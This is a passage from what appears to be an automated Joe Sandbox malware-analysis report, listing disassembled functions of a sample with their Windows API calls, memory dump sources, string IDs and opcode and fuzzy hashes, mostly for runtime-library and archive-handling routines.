                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: 68595c6144a353cd09d29f09e91ed85e780ba2910945981b090ed6087de673e8
                                                                      • Instruction ID: 64d6908536aa3b83bccd88fba0093bd49abfb382b94e912b693b23981269a8d1
                                                                      • Opcode Fuzzy Hash: 68595c6144a353cd09d29f09e91ed85e780ba2910945981b090ed6087de673e8
                                                                      • Instruction Fuzzy Hash: 4AC26A71E0A6688FDB35CE29DD407EAB7B5EB48304F1445EAD84DE7241E778AE818F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog_swprintf
                                                                      • String ID: CMT$h%u$hc%u
                                                                      • API String ID: 146138363-3282847064
                                                                      • Opcode ID: 8f1a9528f606e52ebd25dcb7db776f71706b79b61c3e92026d3c7378ebb7d389
                                                                      • Instruction ID: 48c53afb882d39311dd76dfd4dc251eec93e8ec4ea4d10e78f1b7849aafc869e
                                                                      • Opcode Fuzzy Hash: 8f1a9528f606e52ebd25dcb7db776f71706b79b61c3e92026d3c7378ebb7d389
                                                                      • Instruction Fuzzy Hash: 1B32B4B1510284EBDF15DF74C899FE93BA5AF15300F04847DFD8A8B282DB789A49CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C2874
                                                                      • _strlen.LIBCMT ref: 007C2E3F
                                                                        • Part of subcall function 007D02BA: __EH_prolog.LIBCMT ref: 007D02BF
                                                                        • Part of subcall function 007D1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007CBAE9,00000000,?,?,?,0001047C), ref: 007D1BA0
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007C2F91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                      • String ID: CMT
                                                                      • API String ID: 1206968400-2756464174
                                                                      • Opcode ID: 0a89175d552044054558f90ba6ee16075edac66cabfc3ff819807757c9ef9bbf
                                                                      • Instruction ID: 0a71fb35cb7425519d723a6c4f7f8d8c8cc11483c0e7e8753aff80e46ae9ed5e
                                                                      • Opcode Fuzzy Hash: 0a89175d552044054558f90ba6ee16075edac66cabfc3ff819807757c9ef9bbf
                                                                      • Instruction Fuzzy Hash: 2762D671600245DFDB19DF74C899FEA37A1AF54300F08857EEC9A8B283DB799946CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007DF844
                                                                      • IsDebuggerPresent.KERNEL32 ref: 007DF910
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007DF930
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 007DF93A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                      • String ID:
                                                                      • API String ID: 254469556-0
                                                                      • Opcode ID: 0ef4f760dcbc96d8236db513431f0909bd6b44c40a7c0f94d2982c02c92f1111
                                                                      • Instruction ID: 3b2fb5f1b30769196079eaa2e8f4290ea81e3985f6601d1a01713d4ab9f56e9c
                                                                      • Opcode Fuzzy Hash: 0ef4f760dcbc96d8236db513431f0909bd6b44c40a7c0f94d2982c02c92f1111
                                                                      • Instruction Fuzzy Hash: 32310775D0521DDBDB20DFA4D9897CCBBB8AF08304F1040AAE40DAB350EB759A84CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualQuery.KERNEL32(80000000,007DE5E8,0000001C,007DE7DD,00000000,?,?,?,?,?,?,?,007DE5E8,00000004,00821CEC,007DE86D), ref: 007DE6B4
                                                                      • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,007DE5E8,00000004,00821CEC,007DE86D), ref: 007DE6CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: InfoQuerySystemVirtual
                                                                      • String ID: D
                                                                      • API String ID: 401686933-2746444292
                                                                      • Opcode ID: a32b0bf872bbab294943d366cad595b5b4f50f7e2ce7d55cc4e3128948b0e295
                                                                      • Instruction ID: 72dad5930a6dd962cb8c39edcef82f375aa8e0ab5124bcac54f80ac334de9ac4
                                                                      • Opcode Fuzzy Hash: a32b0bf872bbab294943d366cad595b5b4f50f7e2ce7d55cc4e3128948b0e295
                                                                      • Instruction Fuzzy Hash: F401F7326001096BDB14EE29DC09BED7BBAAFC4334F0CC121ED19EB250D638D905C680
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007E8FB5
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007E8FBF
                                                                      • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 007E8FCC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: 616aa6038af35139787461aabcca07619f09096851091a7e9f4ad5350ffd41b6
                                                                      • Instruction ID: eee03b247621b3e54702db22f06a7db705ed3287a4c52f7a13ed6575afd72470
                                                                      • Opcode Fuzzy Hash: 616aa6038af35139787461aabcca07619f09096851091a7e9f4ad5350ffd41b6
                                                                      • Instruction Fuzzy Hash: 2331D27490122CABCB21DF24DC88BDCBBB8AF08310F5081EAE41CA7250EB349F858F45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      • Opcode ID: 235c05e3bb148d2539835e2995b61a794ddaebb07491cd345e8956dd3da28a4b
                                                                      • Instruction ID: 73d4638296cd1a175b788b672fca66ecb1c6c3c4df67688272371b65b130a7e4
                                                                      • Opcode Fuzzy Hash: 235c05e3bb148d2539835e2995b61a794ddaebb07491cd345e8956dd3da28a4b
                                                                      • Instruction Fuzzy Hash: 83313B71800289AFCB249E79CC85DFB7FBDDB4A304F0441A8F51893252E7389D448B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007ED440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                      • Instruction ID: 77dce1f213e6d76a93d7ab1ef5f887a7673959646711f603f6e50d7802760a3d
                                                                      • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                      • Instruction Fuzzy Hash: F3022C71E012599FDF24CFA9C8806AEBBF1EF48314F25826AD919E7381D735AD41CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007DAF35
                                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,007FE72C,?,?), ref: 007DAF84
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FormatInfoLocaleNumber
                                                                      • String ID:
                                                                      • API String ID: 2169056816-0
                                                                      • Opcode ID: 448ecf78252079cbe9aae6470d402560b7038030fb2a1b24bed5900d21ddc835
                                                                      • Instruction ID: 3b05718a64bc327bf5baec4440c6e0f8cd37950f0ccbde55d6523e015e114fe4
                                                                      • Opcode Fuzzy Hash: 448ecf78252079cbe9aae6470d402560b7038030fb2a1b24bed5900d21ddc835
                                                                      • Instruction Fuzzy Hash: A7015E7A110318AAD7109FA4DC45FAA77BCFF09750F009422FB05D72A1D3749A14CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(007C6DDF,00000000,00000400), ref: 007C6C74
                                                                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 007C6C95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: 871d7a2588478a6624ba309befef9774d46c8e7787067f2d613b6c8349ec4806
                                                                      • Instruction ID: 6a46f06530c7e6ebbc221ddea4354f73ffca4e27100f6676f4e86f9d9a6c1c08
                                                                      • Opcode Fuzzy Hash: 871d7a2588478a6624ba309befef9774d46c8e7787067f2d613b6c8349ec4806
                                                                      • Instruction Fuzzy Hash: 10D0C971348300BFFA210B618D46F2A7B9ABF45B51F18C80DB795E80E1CA7CE424E62D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007F19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007F19EF,?,?,00000008,?,?,007F168F,00000000), ref: 007F1C21
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: 79425f93e019d6b6ef61d240df5f86e9d1beb348902c8747f9f99a0033f741e5
                                                                      • Instruction ID: 2b06fc3400773e461696c6d054e5c74b85b4a31639f151e3deea31e195f168f4
                                                                      • Opcode Fuzzy Hash: 79425f93e019d6b6ef61d240df5f86e9d1beb348902c8747f9f99a0033f741e5
                                                                      • Instruction Fuzzy Hash: E6B14C71210608DFD719CF28C48AB657BE0FF45364F658658EA9ACF3A1C339E992CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007DF66A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor
                                                                      • String ID:
                                                                      • API String ID: 2325560087-0
                                                                      • Opcode ID: 0ac7bba4e4338a21abe1478f169255524c805a5944930c621e895e9477621c57
                                                                      • Instruction ID: edafa4f66b8b77515bb9614e71c4993c2bad276e65bb513ea87488d7dd559515
                                                                      • Opcode Fuzzy Hash: 0ac7bba4e4338a21abe1478f169255524c805a5944930c621e895e9477621c57
                                                                      • Instruction Fuzzy Hash: FC517DB1A00609CFEB24CF54EC857AABBF4FB48314F64852BD406EB361D378A941CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 007CB16B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID:
                                                                      • API String ID: 1889659487-0
                                                                      • Opcode ID: 7f8ca70822b3e0f8ccf071e185fbd72a2e6c3d0a8dae0eaac6ce7f1322c5fb17
                                                                      • Instruction ID: a1afd68c5915f219aa2e2dac62d1c865caf5a78f68f6cfe4c48dde9fd8f31305
                                                                      • Opcode Fuzzy Hash: 7f8ca70822b3e0f8ccf071e185fbd72a2e6c3d0a8dae0eaac6ce7f1322c5fb17
                                                                      • Instruction Fuzzy Hash: 75F054B4D006188FEB18CB18EC96AE573F2F748325F648299D51593390CB74AD80CE64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gj
                                                                      • API String ID: 0-4203073231
                                                                      • Opcode ID: 8bbea630611a5361ecd48b54541d6905bc2a72fc16385e662cb4001100a5dd7f
                                                                      • Instruction ID: c723b3940a196c24c344ebcf99a5981110d0a1a03d9509a7dc96719dd780ede1
                                                                      • Opcode Fuzzy Hash: 8bbea630611a5361ecd48b54541d6905bc2a72fc16385e662cb4001100a5dd7f
                                                                      • Instruction Fuzzy Hash: 95C12776A183418FC354CF29D880A5AFBE1BFC8308F19892DE998D7311D738E955CB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,007DF3A5), ref: 007DF9DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: c7a0d8873ce4978132e2b83731558be291620ad91ebe1be76ad3e9235ec8bc66
                                                                      • Instruction ID: 0b07508958d0a900a2274851edd83e1df172143aaa5bfc8603bb593e66a11790
                                                                      • Opcode Fuzzy Hash: c7a0d8873ce4978132e2b83731558be291620ad91ebe1be76ad3e9235ec8bc66
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
